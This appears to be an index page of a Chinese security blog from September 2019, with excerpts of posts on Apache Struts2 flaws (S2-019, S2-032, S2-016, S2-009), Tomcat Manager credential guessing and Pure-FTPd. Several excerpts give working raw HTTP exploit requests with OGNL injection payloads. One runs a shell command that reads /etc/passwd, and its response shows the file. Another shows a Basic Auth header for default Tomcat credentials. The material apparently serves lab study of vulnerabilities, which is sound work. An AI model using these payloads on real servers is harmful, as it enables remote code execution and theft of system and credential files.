September 12, 2019
Struts2 S2-019 HTTP raw text <!–more–> 检测请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 struts2_security_check 0 利用请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN […]
September 12, 2019
Struts2 S2-020 环境 <!–more–> 正文 https://hub.docker.com/r/tutum/tomcat 已经设置好 host manager 的 tomcat 环境 tomcat
September 12, 2019
某道全版本rce漏洞分析 <!–more–> https://xz.aliyun.com/t/6239
September 12, 2019
Struts S2-032 HTTP raw text <!–more–> 正文 分析 [](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032") 探测请求 POST / HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 209 method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 9 Date: Thu, 12 Sep 2019 04:07:32 GMT 88888887 OGNL method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close 利用请求 POST […]
September 11, 2019
Struts S2-016 HTTP Raw TEXT <!–more–> 利用请求 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/ Content-Language: zh-CN 679 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin […]
September 11, 2019
Struts S2-009 HTTP Raw TEXT <!–more–> 正文 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 444 class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 04:00:24 GMT Content-Length: 15 Connection: keep-alive Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/ Content-Language: zh-CN webpath888888
September 11, 2019
Wireshark 常用的过滤器 | Wireshark frequently used filters
September 11, 2019
CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server <!–more–> 正文 https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 10, 2019
Tomcat 8 Manager 用户认证凭据枚举 <!–more–> HTTP 交互分析 采用 HTTP Basic Auth 认证请求 GET /manager/html HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Authorization: Basic dG9tY2F0OnRvbWNhdA== 认证成功的 HTTP 响应头 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 UTC Set-Cookie: JSESSIONID=1CA160B50A85CD4F22555D92B051B7C9; Path=/manager; HttpOnly Content-Type: text/html;charset=utf-8 Date: Tue, […]
September 9, 2019
Pure-FTPd 漏洞情况分析 <!–more–> 正文 总体情况 https://www.cvedetails.com/product/20682/Pureftpd-Pure-ftpd.html?vendor_id=2152 2011 年被编码 CVE 编号的漏洞 https://www.cvedetails.com/vulnerability-list/vendor_id-2152/product_id-20682/year-2011/Pureftpd-Pure-ftpd.html 2012-2016 年暂未出现存在 CVE 编号的漏洞 2017 年被编码 CVE 编号的漏洞 https://www.cvedetails.com/vulnerability-list/vendor_id-2152/product_id-20682/year-2017/Pureftpd-Pure-ftpd.html 环境搭建 https://hub.docker.com/r/phpstorm/pureftpd/dockerfile docker pull phpstorm/pureftpd docker run –rm -d -p 2121:21 -p 30020-30029:30020-30029 -it phpstorm/pureftpd 交互过程中无版本号信息